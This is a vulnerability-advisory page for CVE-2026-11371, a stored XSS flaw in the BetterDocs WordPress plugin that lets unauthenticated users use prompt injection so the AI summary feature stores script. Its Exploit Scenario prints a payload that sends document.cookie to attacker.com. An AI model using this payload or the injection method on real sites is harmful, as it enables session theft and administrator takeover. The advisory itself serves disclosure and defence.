Skip to main content

BetterDocs CVE-2026-11371

| EUVDEUVD-2026-44870 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-07-16 WPScan GHSA-x6ph-p955-jvgx
6.1
CVSS 3.1 · Vendor: WPScan
Share

Severity by source

Vendor (WPScan) PRIMARY
6.1 MEDIUM
AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
vuln.today AI
6.1 MEDIUM

AI generation endpoint is network-exposed with no authentication (AV:N/PR:N); stored XSS executes in victim browser across scope boundary (S:C/UI:R); impact limited to session data theft and DOM manipulation (C:L/I:L/A:N).

3.1 AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (WPScan).

CVSS VectorVendor: WPScan

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

5
Analysis Generated
Jul 16, 2026 - 13:25 vuln.today
CVSS changed
Jul 16, 2026 - 13:22 NVD
6.1 (MEDIUM)
Patch available
Jul 16, 2026 - 10:18 EUVD
CVE Published
Jul 16, 2026 - 06:00 cve.org
MEDIUM 6.1
CVE Published
Jul 16, 2026 - 06:00 cve.org
UNKNOWN (no severity yet)

DescriptionCVE.org

The BetterDocs WordPress plugin before 4.5.5 does not sanitise an AI-generated documentation summary before storing and outputting it, and the feature that generates it is exposed to unauthenticated users, allowing them to store a malicious payload via prompt injection that executes in the browser of any visitor who views the affected page, including administrators.

AnalysisAI

Stored cross-site scripting via prompt injection in the BetterDocs WordPress plugin (versions 4.0.0 through 4.5.5) allows unauthenticated attackers to permanently implant malicious JavaScript into documentation pages by manipulating the plugin's AI-generated summary feature. Because the AI output is stored unsanitized and the generation endpoint requires no authentication, an attacker can craft adversarial prompts that cause the AI to produce and persist executable script payloads - payloads that then fire in the browser of every subsequent visitor, including WordPress administrators. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Submit adversarial prompt to unauthenticated AI summary endpoint
Delivery
AI generates output containing malicious JavaScript
Exploit
Unsanitized payload written to WordPress database
Install
Admin or visitor navigates to affected documentation page
C2
Browser executes injected script in victim session context
Execute
Session cookie exfiltrated to attacker-controlled server
Impact
Attacker authenticates as administrator

Vulnerability AssessmentAI

Exploitation Exploitation requires that the BetterDocs AI documentation summary generation feature is enabled and that the generation endpoint is reachable over the network - this feature is exposed to unauthenticated users by default in affected versions (4.0.0 through <4.5.5), so no credentials or elevated access are required to plant the payload. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 6.1 Medium score with vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N appropriately captures network reachability, zero-authentication exploitation, and scope change - but the practical risk to WordPress site operators exceeds what the numeric score conveys. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An unauthenticated attacker submits a crafted prompt to the BetterDocs AI summary generation endpoint - for example, instructing the AI to include `<script>fetch('https://attacker.com/exfil?c='+btoa(document.cookie))</script>` as part of the generated documentation. The unsanitized AI output is stored to the database and rendered on the documentation page. …
Remediation Update BetterDocs to version 4.5.5 or later, which introduces output sanitization for AI-generated content prior to storage and rendering. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-11371 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy